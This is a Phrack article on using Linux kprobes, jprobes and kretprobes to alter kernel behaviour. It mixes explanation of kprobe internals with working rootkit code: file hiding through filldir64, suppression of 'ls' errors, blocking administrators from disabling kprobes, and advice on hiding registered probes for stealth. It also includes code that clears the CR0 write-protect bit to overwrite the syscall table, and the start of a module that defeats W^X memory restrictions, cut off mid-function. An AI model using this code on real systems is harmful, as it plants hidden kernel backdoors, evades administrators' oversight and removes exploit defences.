                             ==Phrack Inc.==

               Volume 0x0e, Issue 0x43, Phile #0x06 of 0x10

|=-----------------------------------------------------------------------=|
|=--------------=[ Kernel instrumentation using kprobes ]=---------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ by ElfMaster ]=---------------------------=|
|=----------------------=[ elfmaster@phrack.org ]=-----------------------=|
|=-----------------------------------------------------------------------=|

1 - Introduction
  1.1 - Why write it?
  1.2 - About kprobes
  1.3 - Jprobe example
  1.4 - Kretprobe example & Return probe patching technique

2 - Kprobes implementation
  2.1 - Kprobe implementation
  2.2 - Jprobe implementation
  2.3 - File hiding with jprobes/kretprobes and modifying kernel .text
  2.4 - Kretprobe implementation
  2.5 - A quick stop into modifying read-only kernel segments
  2.6 - An idea for a kretprobe implementation for hackers

3 - Patch to unpatch W^X (mprotect/mmap restrictions)

4 - Notes on rootkit detection for kprobes

5 - Summing it all up

6 - Greetz

7 - References and citations

8 - Code


---[ 1 - Introduction

----[ 1.1 - Why write it?

I will preface this by saying that kprobes can be used for anti-security patching of the kernel. I would also like to point out that kprobes are not the most efficient way to patch the kernel or write rootkits and backdoors, because they simply require more work -- extra innovation. So why write this? Because... we are hackers. Hackers should be aware of any and all resources available to them -- some more auspicious than others. Nonetheless, kprobes are a sweet deal when you consider that they are a native kernel API that is ripe for abuse, even without exceeding its scope. Due to limitations discussed later on, kprobes require some extra innovation when determining how to perform certain tasks, such as file hiding and applying other interesting patches that could subvert or even harden the kernel's integrity.
----[ 1.2 - About kprobes

Without a doubt, the best introduction to kprobes is the Linux kernel source documentation, which contains kprobes.txt. Make sure to read that when you get a chance. Kprobes are a debugging API native to the Linux kernel, built on the processor's trap and single-step facilities -- whatever the processor may be. We are going to assume x86, which at this time has the most kprobe code developed.

-- From kprobes.txt --

Kprobes enables you to dynamically break into any kernel routine and collect debugging and performance information non-disruptively. You can trap at almost any kernel code address, specifying a handler routine to be invoked when the breakpoint is hit. There are currently three types of probes: kprobes, jprobes, and kretprobes (also called return probes). A kprobe can be inserted on virtually any instruction in the kernel. A jprobe is inserted at the entry to a kernel function, and provides convenient access to the function's arguments. A return probe fires when a specified function returns.

--

Based on this definition, one can imagine that the kprobes interface may be used to instrument the kernel in some useful ways, both for security and anti-security; that is what this paper is about. In the recent past I implemented some relatively powerful and complex security patches using kprobes. That is not to say that other patching methods are not still useful, but occasionally one may run into issues using traditional methods such as kernel function trampolines, which are not SMP safe due to the non-atomic nature of swapping code in and out. Kprobes are a native interface, which is nice, but they still present some challenges due to limitations we discuss throughout the paper. Kprobes can be used to patch the kernel in some places, but cannot be used for everything. This is a treatise that can shed some light on when and where kprobes can be used to modify the behavior of the kernel.
Sometimes they must be used in conjunction with another patching method. Before we move on, I wanted to point out the following few facts.

Registered kprobes show up here:

    /sys/kernel/debug/kprobes/list

And the interface can be disabled or enabled by writing a 0 or a 1 here:

    /sys/kernel/debug/kprobes/enabled

The kprobe source code is located in the following places:

    /usr/src/linux/kernel/kprobes.c
    /usr/src/linux/arch/x86/kernel/kprobes.c

Keep in mind that jprobes/kretprobes are 100% based on kprobes, and disabling kprobes as shown above will prevent any kretprobe/jprobe code from working as well. Moving on...

----[ 1.3 - Jprobe example

In this paper we will be working primarily with jprobes and kretprobes. As shown in the kprobe documentation already, there are several functions available for registering and unregistering these probes. Let's pretend for a moment that we are interested in sys_mprotect, and we want to inspect any calls to it and the args that are being passed. For this we could register a jprobe for sys_mprotect. The following code outlines the general idea. Consider that because we are setting a jprobe on a syscall, we need to either declare our jprobe handler using 'asmlinkage' magic, or else get our args directly from the registers. In this example I will get the args directly from the registers, just to show how to obtain the registers for the current task.

-- jprobe example 1 --

NOTE: The jprobe data types will be explained in detail in 2.2 [Jprobe implementation]

int n_sys_mprotect(unsigned long start, size_t len, long prot)
{
        struct pt_regs *regs = task_pt_regs(current);

        start = regs->bx;
        len = regs->cx;
        prot = regs->dx;

        printk("start: 0x%lx len: %zu prot: 0x%lx\n", start, len, prot);
        jprobe_return();
        return 0;
}

/* The following entry in struct jprobe is 'void *entry' and simply points
   to the jprobe function handler that will be executing when the probe is
   hit on the function entry point.
*/

static struct jprobe mprotect_jprobe = {
        .entry = (kprobe_opcode_t *)n_sys_mprotect // function entry
};

static int __init jprobe_init(void)
{
        int ret;

        /* kp.addr is kprobe_opcode_t *addr; from struct kprobe and */
        /* points to the probe point where the trap will occur. In  */
        /* our case we are probing sys_mprotect                     */
        mprotect_jprobe.kp.addr =
            (kprobe_opcode_t *)kallsyms_lookup_name("sys_mprotect");

        if ((ret = register_jprobe(&mprotect_jprobe)) < 0) {
                printk("register_jprobe failed for sys_mprotect\n");
                return -1;
        }
        return 0;
}

int init_module(void)
{
        return jprobe_init();
}

void cleanup_module(void)
{
        unregister_jprobe(&mprotect_jprobe);
}

In the above code, we register a jprobe for sys_mprotect. This means that a breakpoint instruction is placed on the entry point of the function; as soon as it gets called, a trap occurs and control is passed to our n_sys_mprotect() jprobe handler. From this point we can analyze data such as the arguments passed -- whether in registers or on the stack -- as well as any kernel data structures. We can also modify kernel data structures, which is primarily what we rely on for our patches using kprobes. Any attempts to modify the stack arguments or registers will be overridden as soon as our handler function returns -- this is because kprobes saves the register state and stack args prior to calling the handler, and restores these values upon the jprobe_return(), at which point the real syscall or function will execute and do its thing. We will get into much more detail on this topic, and on how to actually modify stack arguments, later on.

----[ 1.4 - Kretprobe example and return probe patching technique

Moving on to kretprobes (also known as return probes). Without kretprobes it wouldn't be so easy to patch the kernel using kprobes; this is because a kernel function that we set a jprobe on might re-modify a kernel data structure -- one that we modified -- as soon as our jprobe handler returns.
If we apply a kretprobe to the situation, we can modify that kernel data structure after the real kernel function returns. Here is an example... Let's say we want to modify the kernel data structure 'kstruct->x' (which is fictitious). We want to modify it, but do not know what value we want to apply to it until 'function_A' executes; yet as soon as the real 'function_A' executes after our jprobe handler, it sets 'kstruct->x' to something of its own. This is where kretprobes come into play. This is the approach we take, which we can call the 'return probe patching' technique.

1. [jprobe handler for function_A]    -> Determines the value that we want
                                         to set on kstruct->x
2. [function_A]                       -> Sets the value of kstruct->x to
                                         some value.
3. [kretprobe handler for function_A] -> Sets the value of kstruct->x to
                                         the value determined by the
                                         jprobe handler.

So as you can see, with kretprobes we end up being able to set the final verdict on a value. Here is a quick example of registering a kretprobe. We will use sys_mprotect for this example as well. The kretprobe data types will be explained in section 2.4 [Kretprobe implementation].

static int mprotect_ret_handler(struct kretprobe_instance *ri,
                                struct pt_regs *regs)
{
        printk("Original return address: 0x%lx\n",
               (unsigned long)ri->ret_addr);
        return 0;
}

static struct kretprobe mprotect_kretprobe = {
        .handler = mprotect_ret_handler, // return probe handler
        .maxactive = NR_CPUS             // max number of kretprobe instances
};

int init_module(void)
{
        mprotect_kretprobe.kp.addr =
            (kprobe_opcode_t *)kallsyms_lookup_name("sys_mprotect");
        return register_kretprobe(&mprotect_kretprobe);
}

As you can see, I utilize kallsyms_lookup_name(), but interestingly a probe can be set on virtually any instruction within the kernel; whatever means you use to get that location is up to you (i.e. System.map). The code is straightforward.
From an internal point of view: by the time sys_mprotect returns, the address at the top of the stack (the ret address) has been modified to point to a function called kretprobe_trampoline(), which in turn sets things up to call our mprotect_ret_handler() function, where we can inspect and modify kernel data. There is no point in modifying the registers, because they were all saved on the stack and will be reset as soon as our handler returns. More on this in the next section. The kretprobe trampoline function will be explored in detail in 2.4 [Kretprobe implementation].

---[ 2 - Kprobes implementation

----[ 2.1 - Kprobe implementation

Firstly I want to make sure we are on the same page about what a basic kprobe is, and the general idea of how it works.

-- Taken from kprobes.txt --

When a kprobe is registered, Kprobes makes a copy of the probed instruction and replaces the first byte(s) of the probed instruction with a breakpoint instruction (e.g., int3 on i386 and x86_64). When a CPU hits the breakpoint instruction, a trap occurs, the CPU's registers are saved, and control passes to Kprobes via the notifier_call_chain mechanism. Kprobes executes the "pre_handler" associated with the kprobe, passing the handler the addresses of the kprobe struct and the saved registers. Next, Kprobes single-steps its copy of the probed instruction. It would be simpler to single-step the actual instruction in place, but then Kprobes would have to temporarily remove the breakpoint instruction. This would open a small time window when another CPU could sail right past the probepoint. After the instruction is single-stepped, Kprobes executes the "post_handler," if any, that is associated with the kprobe. Execution then continues with the instruction following the probepoint.

--

So to clarify: when registering a typical kprobe, a pre_handler should always be assigned so that you can inspect data or do whatever you want at that point. A post_handler may or may not be assigned.
Since we are primarily using jprobes and kretprobes, which are extensions of the kprobe interface, I have chosen to discuss their implementation rather than that of a plain kprobe. All you need to know for now is that registering a basic kprobe inserts a breakpoint instruction at the desired location and executes a pre and a post handler that you assign. As you will see, the jprobe and kretprobe implementations are built on a basic kprobe whose pre and post handlers point to special kernel functions [/usr/src/linux/arch/x86/kernel/kprobes.c] that act as a sort of prologue/epilogue for the actual handler. More will be revealed in the following sections.

----[ 2.2 - Jprobe implementation

If we are aware of the internal implementation of jprobes and kretprobes, then we can utilize them better -- we could even patch the interface itself to act more the way we want, but that would defeat the purpose of this paper, which aims at patching the kernel using the kprobes interface as it is (although we will explore some external modifications of kprobes later on). Firstly, take a look at the following struct:

struct jprobe {
        struct kprobe kp;
        void *entry;    /* probe handling code to jump to */
};

When we call register_jprobe(), it in turn calls register_jprobes(&jp, 1). register_jprobes() is all about setting up the jprobe pre/post and entry handlers.

-- snippet from register_jprobes() in /usr/src/linux/kernel/kprobes.c --

        /* See how jprobes utilizes kprobes? It uses the */
        /* pre/post handler                              */
        jp->kp.pre_handler = setjmp_pre_handler;
        jp->kp.break_handler = longjmp_break_handler;
        ret = register_kprobe(&jp->kp);

--

The pre_handler is called before your function/entry handler and is responsible for saving the contents of the stack and the registers, and for setting the eip.
In normal circumstances the developer has no control over the pre/post handlers for jprobes, because the kprobe pre and post handler entries within struct kprobe do not point to your own custom handlers, but instead to specialized handlers specifically for the jprobe prologue/epilogue.

        /* Called before addr is executed. */
        kprobe_pre_handler_t pre_handler;
        /* Called after addr is executed, unless... */
        kprobe_post_handler_t post_handler;

You could say that the execution of a jprobe looks like this:

1. [jprobe pre_handler]      Backup stack and register state
2. [jprobe function handler] Do elite modifications to kernel
3. [jprobe post_handler]     Restore original stack and registers

Let's take a peek at the pre_handler, which backs up the stack and registers.

int __kprobes setjmp_pre_handler(struct kprobe *p, struct pt_regs *regs)
{
        struct jprobe *jp = container_of(p, struct jprobe, kp);
        unsigned long addr;
        struct kprobe_ctlblk *kcb = get_kprobe_ctlblk();

        kcb->jprobe_saved_regs = *regs;
        kcb->jprobe_saved_sp = stack_addr(regs);
        addr = (unsigned long)(kcb->jprobe_saved_sp);

        /*
         * As Linus pointed out, gcc assumes that the callee
         * owns the argument space and could overwrite it, e.g.
         * tailcall optimization. So, to be absolutely safe
         * we also save and restore enough stack bytes to cover
         * the argument area.
         */
        memcpy(kcb->jprobes_stack, (kprobe_opcode_t *)addr,
               MIN_STACK_SIZE(addr));
        regs->flags &= ~X86_EFLAGS_IF;
        trace_hardirqs_off();
        regs->ip = (unsigned long)(jp->entry);
        return 1;
}

Pay close attention to the code comment above; as with Chuck Norris... if Linus says it, then it MUST be true! As you can see, the function gets the current stack location using the stack_addr() macro, and then memcpy's it over to kcb->jprobes_stack, which is a backup of the stack to be restored in the post handler.
The stack being restored prior to the real function being called does impose some obvious restrictions, but that does not mean we can't manipulate the pointer values that are passed on the stack, which is something we take advantage of in section 2.3 (File hiding). After the jprobe handler is finished, the jprobe post handler is called -- here is the code.

int __kprobes longjmp_break_handler(struct kprobe *p, struct pt_regs *regs)
{
        struct kprobe_ctlblk *kcb = get_kprobe_ctlblk();
        u8 *addr = (u8 *) (regs->ip - 1);
        struct jprobe *jp = container_of(p, struct jprobe, kp);

        if ((addr > (u8 *) jprobe_return) &&
            (addr < (u8 *) jprobe_return_end)) {
                if (stack_addr(regs) != kcb->jprobe_saved_sp) {
                        struct pt_regs *saved_regs = &kcb->jprobe_saved_regs;
                        printk(KERN_ERR
                               "current sp %p does not match saved sp %p\n",
                               stack_addr(regs), kcb->jprobe_saved_sp);
                        printk(KERN_ERR "Saved registers for jprobe %p\n", jp);
                        show_registers(saved_regs);
                        printk(KERN_ERR "Current registers\n");
                        show_registers(regs);
                        BUG();
                }
                *regs = kcb->jprobe_saved_regs;
                memcpy((kprobe_opcode_t *)(kcb->jprobe_saved_sp),
                       kcb->jprobes_stack,
                       MIN_STACK_SIZE(kcb->jprobe_saved_sp));
                preempt_enable_no_resched();
                return 1;
        }
        return 0;
}

The code primarily restores the stack and re-enables preemption; probe handlers are run with preemption disabled.

----[ 2.3 - File hiding using jprobes/kretprobes

Let's consider a simple file hiding approach that consists of using the dirent->d_name pointer in filldir64().
char *hidden_files[] = {
#define HIDDEN_FILES_MAX 3
        "test1",
        "test2",
        "test3"
};

struct getdents_callback64 {
        struct linux_dirent64 __user *current_dir;
        struct linux_dirent64 __user *previous;
        int count;
        int error;
};

/* Global data for kretprobe to act on */
static struct global_dentry_info {
        unsigned long d_name_ptr;
        int bypass;
} g_dentry;

/* Our jprobe handler that globally saves the pointer value of   */
/* dirent->d_name so that our kretprobe can modify that location */
static int j_filldir64(void *__buf, const char *name, int namlen,
                       loff_t offset, u64 ino, unsigned int d_type)
{
        int found_hidden_file, i;
        struct linux_dirent64 __user *dirent;
        struct getdents_callback64 *buf = (struct getdents_callback64 *)__buf;
        int reclen;

        dirent = buf->current_dir;
        reclen = ROUND_UP64(NAME_OFFSET(dirent) + namlen + 1);

        /* Initialize custom stuff */
        g_dentry.bypass = 0;
        found_hidden_file = 0;

        for (i = 0; i < HIDDEN_FILES_MAX; i++)
                if (strcmp(hidden_files[i], name) == 0)
                        found_hidden_file++;

        if (!found_hidden_file)
                goto end;

        /* Create pointer to where we need to modify in dirent   */
        /* since someone is trying to view a file we want hidden */
        g_dentry.d_name_ptr = (unsigned long)(unsigned char *)dirent->d_name;
        g_dentry.bypass++; // note that we want to bypass viewing this file
end:
        jprobe_return();
        return 0;
}

/* Our kretprobe handler, which we use to nullify the filename */
/* Remember the 'return probe technique'? Well this is it.
*/
static int filldir64_ret_handler(struct kretprobe_instance *ri,
                                 struct pt_regs *regs)
{
        char *ptr, null = 0;

        /* Someone is looking at one of our hidden files */
        if (g_dentry.bypass) {
                /* Let's nullify the filename so it simply is invisible */
                ptr = (char *)g_dentry.d_name_ptr;
                copy_to_user((char *)ptr, &null, sizeof(char));
        }
        return 0;
}

The code above is quite adept at hiding files based on getdents64 being called, but unfortunately 'ls' from GNU coreutils will call lstat64 for every d_name found, and if some of the d_names start with a null byte then lstat will fail and ls will print a "cannot access" error for each of them. So if we are hiding 3 files, we will see that error message 3 times prior to the directory listing (which will not show the hidden files). One of the primary limitations of kprobe patching is that we cannot modify the return value of a function; the closest we can get is setting up a return probe to modify data that the function may have operated on. There are some indirect methods of altering the return value at times, but after following the code path for lstat64 I found no way to remedy the issue using kprobes. Instead I took the not-so-elegant approach of redirecting stderr to /dev/null by setting a jprobe and a return probe on sys_write. Additionally, while modifying sys_write, we might as well redirect any attempts to disable kprobes to /dev/null as well. A super user can simply 'echo 0 > /sys/kernel/debug/kprobes/enabled' to disable the kprobes interface (we don't want this). One of the parameters we will pass to insmod when installing our LKM will be the inode of the 'enabled' /sys entry. Below is the code for our modified sys_write.

asmlinkage static int j_sys_write(int fd, void *buf, unsigned int len)
{
        char *s = (char *)buf;
        char devnull[] = "/dev/null";
        struct file *file;
        struct dentry *dentry = NULL;
        unsigned int ino;
        char comm[255];

        stream_redirect = 0; // do we redirect to /dev/null?
        /* Make sure this is an ls program; otherwise we'd prevent */
        /* other programs from being able to send 'cannot access'  */
        /* in their stderr stream                                  */
        get_task_comm(comm, current);
        if (strcmp(comm, "ls") != 0)
                goto out;

        /* Check to see if this is an ls stat complaint, or ls -l weirdness.  */
        /* There are two separate calls to sys_write, hence two strstr checks */
        if (strstr(s, "cannot access") || strstr(s, "ls:")) {
                printk("Going to redirect\n");
                goto redirect;
        }

        /* Check to see if they are trying to disable kprobes */
        /* with 'echo 0 > /sys/kernel/debug/kprobes/enabled'  */
        file = fget(fd);
        if (!file)
                goto out;
        dentry = dget(file->f_dentry);
        if (!dentry)
                goto out;
        ino = dentry->d_inode->i_ino;
        dput(dentry);
        fput(file);

        if (ino != enabled_ino)
                goto out;

redirect:
        /* If we made it here, then we are doing a redirect to /dev/null */
        stream_redirect++;
        {
                mm_segment_t o_fs = get_fs();

                set_fs(KERNEL_DS);
                n_sys_close(fd);
                fd = n_sys_open(devnull, O_RDWR, 0);
                set_fs(o_fs);
        }
        global_fd = fd;
out:
        jprobe_return();
        return 0;
}

/* Here is the return handler to close the fd to /dev/null. */
static int sys_write_ret_handler(struct kretprobe_instance *ri,
                                 struct pt_regs *regs)
{
        if (stream_redirect) {
                n_sys_close(global_fd);
                stream_redirect = 0;
        }
        return 0;
}

We close the existing file descriptor and open a new one, which gets the same fd number but now refers to /dev/null. This redirection of stderr to /dev/null is only for the current process.
To understand it a bit more, we can follow the code path of do_sys_open(). I've added some extra comments:

long do_sys_open(int dfd, const char __user *filename, int flags, int mode)
{
        char *tmp = getname(filename);
        int fd = PTR_ERR(tmp);

        if (!IS_ERR(tmp)) {
                fd = get_unused_fd_flags(flags);
                if (fd >= 0) {
                        struct file *f = do_filp_open(dfd, tmp, flags, mode, 0);
                        if (IS_ERR(f)) {
                                put_unused_fd(fd);
                                fd = PTR_ERR(f);
                        } else {
                                /* Notice fsnotify_open() */
                                fsnotify_open(f->f_path.dentry);
                                /* Associate fd with /dev/null */
                                fd_install(fd, f);
                                trace_do_sys_open(tmp, flags, mode);
                        }
                }
                putname(tmp);
        }
        return fd;
}

The new file descriptor is associated with its new file in the current task's file table (current->files, a struct files_struct *) using fd_install().

void fd_install(unsigned int fd, struct file *file)
{
        struct files_struct *files = current->files;    // <-- notice here
        struct fdtable *fdt;

        spin_lock(&files->file_lock);
        fdt = files_fdtable(files);                     // <-- notice here
        BUG_ON(fdt->fd[fd] != NULL);
        rcu_assign_pointer(fdt->fd[fd], file);          // <-- notice here
        spin_unlock(&files->file_lock);
}

One important note to the reader: /sys/kernel/debug/kprobes/list is the file that shows any registered kprobes. Simply use a redirect technique like the one above -- track opens of that file and redirect any writes to stdout to /dev/null if the list contains a probe that you have registered. Very trivial, and absolutely necessary to maintain a stealth presence. As the topic of rootkits has become trite... I would like to introduce some other kprobe examples. Firstly, let us discuss the kretprobe implementation in detail. It will give some more insight into the limitations of kprobes and also expand your mind on how the kprobe implementation may be modified -- which is not covered in this paper.

----[ 2.4 - Kretprobe implementation

The kretprobe implementation is especially interesting, primarily because it is an innovative and nicely engineered chunk of code. Here is how it works.
-- From kprobes.txt --

When you call register_kretprobe(), Kprobes establishes a kprobe at the entry to the function. When the probed function is called and this probe is hit, Kprobes saves a copy of the return address, and replaces the return address with the address of a "trampoline." The trampoline is an arbitrary piece of code -- typically just a nop instruction. At boot time, Kprobes registers a kprobe at the trampoline.

--

The kretprobe implementation is really just a creative way of using kprobes: registering them and assigning the trap handlers functions that deal with modifying the return address.

-- From /usr/src/linux/kernel/kprobes.c --

int __kprobes register_kretprobe(struct kretprobe *rp)
{
        int ret = 0;
        struct kretprobe_instance *inst;
        int i;
        void *addr;

        ... <code> ...

        rp->kp.pre_handler = pre_handler_kretprobe;
        rp->kp.post_handler = NULL;
        rp->kp.fault_handler = NULL;
        rp->kp.break_handler = NULL;

        ... <code> ...
}

NOTE: Notice rp->kp.pre_handler -- kp is a struct kprobe, and its pre_handler is assigned pre_handler_kretprobe. So when the entry probe is hit, pre_handler_kretprobe() will call arch_prepare_kretprobe(), which saves the original return address and inserts the new one:

void __kprobes arch_prepare_kretprobe(struct kretprobe_instance *ri,
                                      struct pt_regs *regs)
{
        unsigned long *sara = stack_addr(regs);

        ri->ret_addr = (kprobe_opcode_t *) *sara;

        /* Replace the return addr with trampoline addr */
        *sara = (unsigned long) &kretprobe_trampoline;
}

Notice the last line, which sets the return address to the trampoline. The trampoline is actually defined in an assembly stub, which for 32-bit x86 looks like this:

        asm volatile (
                        ".global kretprobe_trampoline\n"
                        "kretprobe_trampoline: \n"
                        /* Skip cs, ip, orig_ax and gs.
                         * trampoline_handler() will plug in these values
                         */
                        "       subl $16, %esp\n"
                        "       pushl %fs\n"
                        "       pushl %es\n"
                        "       pushl %ds\n"
                        "       pushl %eax\n"
                        "       pushl %ebp\n"
                        "       pushl %edi\n"
                        "       pushl %esi\n"
                        "       pushl %edx\n"
                        "       pushl %ecx\n"
                        "       pushl %ebx\n"
                        "       movl %esp, %eax\n"
                        "       call trampoline_handler\n"
                        /* Move flags to cs */
                        "       movl 56(%esp), %edx\n"
                        "       movl %edx, 52(%esp)\n"
                        /* Replace saved flags with true return address. */
                        "       movl %eax, 56(%esp)\n"
                        "       popl %ebx\n"
                        "       popl %ecx\n"
                        "       popl %edx\n"
                        "       popl %esi\n"
                        "       popl %edi\n"
                        "       popl %ebp\n"
                        "       popl %eax\n"
                        /* Skip ds, es, fs, gs, orig_ax and ip */
                        "       addl $24, %esp\n"
                        "       popf\n"
                        "       ret\n");

(The 64-bit variant, selected with CONFIG_X86_64 in the real source, is omitted here.)

After the register state is backed up on the stack, the stub calls trampoline_handler(), which essentially executes any return probe handlers associated with the kretprobe for the given function. Looking at the actual function gives some more insight.

static __used __kprobes void *trampoline_handler(struct pt_regs *regs)
{
        struct kretprobe_instance *ri = NULL;
        struct hlist_head *head, empty_rp;
        struct hlist_node *node, *tmp;
        unsigned long flags, orig_ret_address = 0;
        unsigned long trampoline_address =
                (unsigned long)&kretprobe_trampoline;

        INIT_HLIST_HEAD(&empty_rp);
        kretprobe_hash_lock(current, &head, &flags);
        /* fixup registers */
#ifdef CONFIG_X86_64
        regs->cs = __KERNEL_CS;
#else
        regs->cs = __KERNEL_CS | get_kernel_rpl();
        regs->gs = 0;
#endif
        regs->ip = trampoline_address;
        regs->orig_ax = ~0UL;

        /*
         * It is possible to have multiple instances associated with a
         * given task either because multiple functions in the call path
         * have return probes installed on them, and/or more than one
         * return probe was registered for a target function.
         *
         * We can handle this because:
         *     - instances are always pushed into the head of the list
         *     - when multiple return probes are registered for the same
         *       function, the (chronologically) first instance's ret_addr
         *       will be the real return address, and all the rest will
         *       point to kretprobe_trampoline.
         */
        hlist_for_each_entry_safe(ri, node, tmp, head, hlist) {
                if (ri->task != current)
                        /* another task is sharing our hash bucket */
                        continue;

                if (ri->rp && ri->rp->handler) {
                        __get_cpu_var(current_kprobe) = &ri->rp->kp;
                        get_kprobe_ctlblk()->kprobe_status = KPROBE_HIT_ACTIVE;
                        ri->rp->handler(ri, regs);
                        __get_cpu_var(current_kprobe) = NULL;
                }

                orig_ret_address = (unsigned long)ri->ret_addr;
                recycle_rp_inst(ri, &empty_rp);

                if (orig_ret_address != trampoline_address)
                        /*
                         * This is the real return address. Any other
                         * instances associated with this task are for
                         * other calls deeper on the call stack
                         */
                        break;
        }

        kretprobe_assert(ri, orig_ret_address, trampoline_address);
        kretprobe_hash_unlock(current, &flags);

        hlist_for_each_entry_safe(ri, node, tmp, &empty_rp, hlist) {
                hlist_del(&ri->hlist);
                kfree(ri);
        }
        return (void *)orig_ret_address;
}

The original return address value is returned, and then the kretprobe_trampoline stub copies it onto the stack at the right location, at which point all of the saved registers are pop'd and restored -- resulting in a return to the original calling function with the original return value. I suppose it doesn't take an overactive imagination to see that the kretprobe_trampoline stub code could be modified to return a different value. This could be done in several ways, but it would exceed the scope of hacking purely with kprobes: the arch_prepare_kretprobe() function would have to be patched, and sadly it cannot be patched using a kprobe, because any function marked __kprobes cannot itself be hooked with a kprobe.

-- A simple patch within arch_prepare_kretprobe()

        *sara = (unsigned long)&kretprobe_trampoline;

Could be changed to:

        *sara = (unsigned long)&custom_asm_stub;

The problem is that arch_prepare_kretprobe() would have to be modified using a technique other than kprobes, which is of course easy enough, but exceeds this paper's scope.
If you are interested in doing this, the next section will give you a trick that will be necessary for doing so.

----[ 2.5 - A quick stop into modifying read-only kernel segments

If you do feel like hijacking arch_prepare_kretprobe() using a function trampoline, remember that modern Intel CPUs have the write-protect bit (cr0.wp), which prevents supervisor-mode writes to read-only pages; so any time you want to modify a data structure that resides in .rodata, you will need to use the functions I provide below. The following types of data structures often exist in the kernel's text segment:

1. void **sys_call_table
2. const struct file_operations <fs_fops_name>
3. const struct vm_ops <vma_vmops_name>
4. kernel functions

Data structures defined as 'const' go into the .rodata section, which is at the end of the text segment, and the kernel code itself generally lives in the .text section of the text segment. Attempting writes to these locations will cause kernel freezes/panics/oopses. Some people modify the page table entries of the read-only pages they want to modify, but the functions I have provided below are much simpler, and an example follows them.
/* FUNCTION TO DISABLE WRITE PROTECT BIT IN CPU */
static void disable_wp(void)
{
        unsigned int cr0_value;

        asm volatile ("movl %%cr0, %0" : "=r" (cr0_value));

        /* Disable WP (bit 16 of cr0) */
        cr0_value &= ~(1 << 16);

        asm volatile ("movl %0, %%cr0" :: "r" (cr0_value));
}

/* FUNCTION TO RE-ENABLE WRITE PROTECT BIT IN CPU */
static void enable_wp(void)
{
        unsigned int cr0_value;

        asm volatile ("movl %%cr0, %0" : "=r" (cr0_value));

        /* Enable WP */
        cr0_value |= (1 << 16);

        asm volatile ("movl %0, %%cr0" :: "r" (cr0_value));
}

So if you wanted to modify a kernel function pointer that exists within the text segment (if it is declared const) -- i.e. the sys_call_table:

        disable_wp();
        sys_call_table[__NR_write] = (void *)n_sys_write;
        enable_wp();

Or, assuming you have a function that hijacks arch_prepare_kretprobe() using the method discussed in [3]:

        disable_wp();
        hijack_arch_prepare_kretprobe();
        enable_wp();

You get the idea. But since we've fallen a bit off track, let's move into the next section, which is actually more relevant to the paper.

----[ 2.6 - An idea for a kretprobe implementation for hackers

The primary restriction in patching the kernel should be obvious by now: we CANNOT modify the return value in return probes (kretprobes). If someone felt so inclined, they could (in an LKM) implement something very similar to the kretprobe implementation. This would allow us to instrument the kernel using kprobes and modify the return value -- thereby easily patching functions like filldir64, where our special kretprobe implementation could simply 'return 0' if the 'char *d_name' matched a file we wanted to hide. If the reader studies /usr/src/linux/kernel/kprobes.c after reading the above section on the kretprobe implementation, it becomes apparent that a more flexible kretprobe implementation could be designed. This is hardly difficult if the reader has followed this paper in its entirety.
I simply did not have enough time to design this feature -- a kretprobe for hackers that allows control of the return value. Let's call this feature 'rpe' (return probe elite). The BASIC schematics would look like:

int register_rpe(struct kretprobe *rp)
{
        ... <code> ...
        rp->kp.pre_handler = pre_handler_rpe;
        ... <code> ...
}

static int pre_handler_rpe(struct kprobe *p, struct pt_regs *regs)
{
        arch_prepare_rpe(regs);
}

void arch_prepare_rpe(struct pt_regs *regs)
{
        unsigned long *ret = stack_addr(regs);
        ret_addr = (kprobe_opcode_t *) *ret;

        /* Replace the return addr with trampoline addr */
        *ret = (unsigned long) &rpe_trampoline;
}

rpe_trampoline could be either an asm stub or an actual function -- either way you would want to back up the registers before calling your handler, which does what you want: process data and ultimately return whatever value you like. For instance:

__asm__ ("movl $val, %eax\n"
         "push $ret_addr\n"
         "ret");

Since I did not provide an implementation for a more flexible kretprobe, the reader may be interested in doing so. Once I get an opportunity I intend on writing an LKM patch for one and releasing it.

---[ 3 - Patch to unpatch W^X (mprotect/mmap restrictions)

Let's move on to a couple of other patches using the existing kprobe features to show some usefulness other than a file hiding mechanism. These two patches aim at disabling the W^X feature that is enabled in some kernels -- PaX, for instance, calls this mprotect restrictions. W^X means that an mmap segment cannot be created or modified to be both write+execute. The patches below give us two benefits:

1. On systems with the NX (no_exec_pages) bit set, we will be able to do
   things like mark the data segment as executable and inject code there
   for execution using ptrace.

2. Many ELF protectors (Burneye, Shiva, Elfcrypt, etc.)
store the encrypted executable in the text segment of the stub/loading code, and decrypting part of a program's own text is considered self-modifying code -- W^X prevents this -- so with our anti-W^X patch we can use our ELF protectors, and once again make segments such as the stack and data segment executable on systems with the NX bit set, where mprotect/mmap restrictions really make a difference.

An important note: due to the design of the following patch, we cannot change the return values, so mprotect and mmap will both give a return value that says they failed -- don't exit based on error checking, because your write+execute mmap and mprotect attempts actually succeed. To test, you can look at /proc/<pid>/maps of the given process.

-- tested on 2.6.18 -- On modern systems simply change regs->eax to regs->ax in the two necessary spots. Also, declaring the module license as GPL is not necessary to use kprobes on modern systems.

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/kprobes.h>
#include <linux/mm.h>
#include <linux/fs.h>
#include <linux/file.h>

#define PROT_READ       0x1     /* Page can be read. */
#define PROT_WRITE      0x2     /* Page can be written. */
#define PROT_EXEC       0x4     /* Page can be executed. */
#define PROT_NONE       0x0     /* Page can not be accessed. */

#define MAP_FIXED       0x10
#define MAP_ANONYMOUS   0x20    /* don't use a file */
#define MAP_GROWSDOWN   0x0100  /* stack-like segment */
#define MAP_DENYWRITE   0x0800  /* ETXTBSY */
#define MAP_EXECUTABLE  0x1000  /* mark it as an executable */

/*
 * It is preferable to write a script that gets
 * kallsyms_lookup_name() from System.map and then
 * passes it as a module parameter, but in this example
 * we just look it up and assign it ourselves, so
 * make sure to change the address.
 */
unsigned long (*_kallsyms_lookup_name)(char *) = (void *)0xc043e5d0; // change this

unsigned long (*_get_unmapped_area)(struct file *file, unsigned long addr,
                unsigned long len, unsigned long pgoff, unsigned long flags);

static struct {
        int assign_wx;
        unsigned long start;
        size_t len;
        long prot;
} mprotect;

MODULE_LICENSE("GPL");

asmlinkage int kp_sys_mprotect(unsigned long start, size_t len, long prot)
{
        struct vm_area_struct *vma = current->mm->mmap;

        mprotect.assign_wx = 0;
        mprotect.start = start;
        mprotect.prot = prot;

        /* This doesn't concern us */
        if (!(prot & PROT_EXEC) && !(prot & PROT_WRITE))
                goto out;

        down_write(&current->mm->mmap_sem);

        /* Get vma for start memory area */
        vma = find_vma(current->mm, start);
        if (!vma)
                goto free_sem;

